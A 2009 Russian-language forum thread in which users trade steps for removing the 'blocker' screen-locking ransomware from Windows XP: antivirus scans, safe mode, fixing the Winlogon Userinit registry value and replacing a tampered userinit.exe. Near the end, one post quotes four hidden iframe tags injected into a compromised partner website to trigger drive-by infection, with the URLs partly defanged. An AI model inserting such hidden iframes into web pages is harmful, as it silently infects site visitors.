windows заблокирован... как лечить(+)

Короче, вылечил такой вирус у шефа на компе.

Что делал:
1) Загрузил свежий CureIt
2) Загрузил зараженную машину с диска Windows PE (или ЛайфСД)
3) Проверил все диски КуреИтом.
Нашел он не один, а сразу три вируса. :-)
Один из них был blocker. КуреИт грохнул экзешник, а файл blocker.bin, как я потом позже увидел, КуреИт не удалял. Его вручную я грохнул уже сам из папки Documents and settings\AllUsers
4) Дальше попробывал загрузить машину в обычном режиме - ни фига! Пустой рабочий стол. :-( Без иконок и панелей.

5) Загрузился в безопасном режиме. Стал смотреть реестр.
6) Вирус прописался в ветке реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
в строчке "Userinit" C:\WINDOWS\system32\userinit.exe, "вирус"
7) Грохнул его оттуда оставив только: C:\WINDOWS\system32\userinit.exe,
8) Полез проверять сам файл userinit.exe.
Он оказался странного вида, без подписи Микрософта.
Это сразу насторожило. Хотя дата создания файла стояла стандартная для Виндозы ХП (2004год).
9) В результате переписал с соседней машины файл userinit.exe на флешку и загрузившись снова с диска СД - заменил им существующий.
Существующий userinit.exe был явно изменен вирусом. Причем Др.Веб на него НЕ реагировал, как на вирус.

После этого машина загрузилась в нормальном режиме. :-) Всё работает.
Почистил систему еще от оставшихся следов вируса программой OSAM Autorunner (рекомендую).

Вот такой непростой вирусяка... :vote:

Очета не будет, поскольку получилось также, как и у ребенковского компа.
При загрузке в безопасном режиме успел увидеть только окно, что в первом топике нарисован. Комп загрузился спокойно. Пошерстил руками, полазил через AVZ. Ничего не нашел.
В общем, получилось как и здесь:

Но, ни один антивирус не рапортовал о поимке. В логах тоже никаких записей о вирусах. :-(


У ребенка стоял НОД 2.5, у других "подопытных":
- домашний комп с KAV 2009 (лицензионный), базы свежие.
- рабочий с Касперским 6 WW.

Но, рабочий я не лечил. Сказал только потерпевшему, что если его админы не справятся, тогда пусть звонит мне. Звонка не было, возможно, что справились. :-)

Чота скинул тредстартеру в личку вирь этот, а он не отписывается.
поди заблочило комп, а как лечиться прочитать не успел :-D

ОФИГЕТЬ! :-)
Вчера ржал над темой, а сегодня пришлось это дело лечить :-)

Процесс называется blocker.exe
Но если его удаленно убивать с помощью телнета и командной строки, то убивается только "экран блокировки", клавиатура и мышь при этом остаются заблокированными,
но похоже просто моментально убиваются процессы аля "taskmgr.exe", "explorer.exe",
потому что при удаленном запуске на экране что-то успевает моргнуть :-)
Даже загрузка в safe режиме не помогает. Но если запустить восстановление системы,
то все хорошо лечится.
И смею заверить, что это не вирус, а обычная попрошайка, которая хорошо перехватывает прерывания и легко удаляется :-)

Есть еще подобная живность... Процесс именуется lsasss.exe (не путать с lsass.exe)


[Сообщение изменено пользователем 09.04.2009 21:43]

просто комп не готов для проверки...
на своем както очкую проверять))))

Видимо, это подлые хакерские изобретения для того чтобы доить разных простодушных юзерей. :ultra: :cool: :-D

подскажите пожалуйста бедному ребенку (мне) который не знает что и где ручками шерстить, по порядочку что делать...блиииин..как надоело. всё разом. сначала...порноплагин теперь это..я боюсь бук вырубать...

http://www-over.ru/ :-)
а то компьютер, компьютер - тут целый интернет не робит)))

Хм, вчера без проблем вылечил.
Бук, при запуске выкидывало это окно.
Нажал кнопку выключения, появился рабочий стол, запустил раз 5 эксплорер, получил завсший процесс, который снять можно было только руками. Вот у меня появилось время для того, что бы вирус руками убить, убил из профайла пару фалов, потом ребут, потом в реестре удалил остатки и все:-)

а может кого нибудь не затруднит последовательно для чайников написать что откуда удалить...я комп перегружала раз мильон и...алилуя...он меня пустил...теперь вот сижу и не знаю откуда вирус вычищать

:fotku:

чью это? :-) вируса? или чайника?? :-D
да и вообще то я вроде не с целью знакомства, я тут с горя убиваюсь, как бы всё не рухнуло нахрен, а вы тут о каких то реесрах..и прочих странных вещах...

Не надо убиваться, не время впадать в отчаяние.
Вот отсюда ftp://ftp.drweb.com/pub/drweb/cureit/launch.exe выкачиваете антивирусную утилиту, которой проверяете (лечите) компьютер. Ваш порноплагин вылавливается КурИт-ом, вымогатель по имени - blocker тоже есть базе КурИт-а.

P.S.: Когда полечитесь, не забудьте поставить нормальный антивирус, который будет обновляться..

плагин у меня куреит не нашел, я его кажется avzом, но не факт...зопуталась уже во всем, что делала


потому сомневаюсь и в этом....


a что посоветуете?

Нет идеальных антивирусов, также как супер таблеток от всех болезней, любой антивирус может бороться только с известными вирусами, поэтому любой новый вирус пройдёт через Ваши защиты, надо чётко отдавать себе отчёт при работе с флэшками, интернетом, почтой, надо понимать, что если вы прыгаете в яму с дерьмом, то не надо удивляться что от вас потом дурно пахнет, обходите "выгребные ямы" интернета стороной и вероятность заразиться существенно снизится, в принципе можно вообще обходиться без антивируса, и лишь по симптомам проверять машину бесплатными утилитами от антивирусных продуктов.

Найти умного, красивого, доброго, комьютерного мальцыка... погладить его по головушке, нежно прижать к себе и попросить всё наладить в вашем измученном от опытов персональном компьютере и он за полчаса совершит маленькое чудо - всё будет работать исправно. :-D

Это всё равно что идти в публичный дом без презерватива и марлевой повязки смоченной растворе хлорки или доместос.. :ultra: :cool: :-D



[Сообщение изменено пользователем 10.04.2009 10:23]

+ 100

Советовать что-то, неблагодарное дело. Мне больше нравится Касперский, а кто-то его, как чумного, за версту обходит, используя что-угодно, но только не Каспера. :-)


Полную проверку компьютера делали? Или только на быстрой остановились? Вообще у этого плагина только одна dll-ка, которая лежит в All User. Убивается эта dll - умирает плагин.



Ай, маладэц! Эта вещь уже для знающих людей. Благодаря ему я и знаю, где лежала та dll.
:-)

Дык я и написал - обходите стороной публичный дом, но если всё таки пошли и не смотря на презерватив цепанули там пару "подарков", то не удивляйтесь. :-D

в общем сам вирус погрохал вроде, но т.к. он видимо userinit меняет теперь при загрузке выбор учетки и в нее не заходит пишет: загрузка личных параметров и потом сразу закрытие учетной записи, ну или что-то такое и снова выбор учетки. в безопасном тоже самое... как восстановление системы запустить можно?
с лайф сиди загрузился если флешку увидит попробую зменить юзеринит. только он у меня от профи а на ноуте хоум незнаю подойдет нет...

проверьте ключ:
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows NT/Current Version/Winlogon
значение параметра Userinit должно быть C:\WINDOWS\system32\userinit.exe,

ну комп вроде загружается сделал восстановление системы, пока вроде ниче...

Сегодня нашли откуда шеф цепанул вирус.
Цепанул с сайта партнеров. Просто открыл сайт - и произошло заражение.
Просмотрели исходник стартовой страницы сайта. Видимо сайт вскрыли.
И добавили в стартовую страницу в самом конце такие строчки:

<iframe src="http://*superbetfair.cn/in.cgi?income42" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://*cutlot.cn/in.cgi?income49" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://*cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://*mixante.cn/in.cgi?income52" width=1 height=1 style="visibility: hidden"></iframe>


Все эти скрытые фреймы пускались автоматом, когда открывалась страница сайта. И редиректом вели на http://*hyperliteautoservices.cn/index.php
(ссылка подредактирована, чтобы кто читает тему - не ткнули и не заразились).

Сайт партнеров продолжал работать и открываться, а вирус уже проникал в машину...
Такая вот фигня...


ПС Партнерам сообщили, фреймы они убрали.

Мерси за пояснения)))) я просто ну как бы помягче не особо с системами то... :-o



ой это где ж такое счастье то найти ещё никем не оприходованное? :-D остается одно из 3х :-D



ой а вот мне бы кто подсказал, как ключ то проверить :-o

Спасибо огромное! вся схема работает на 100%!!! только что вылечил комп на работе.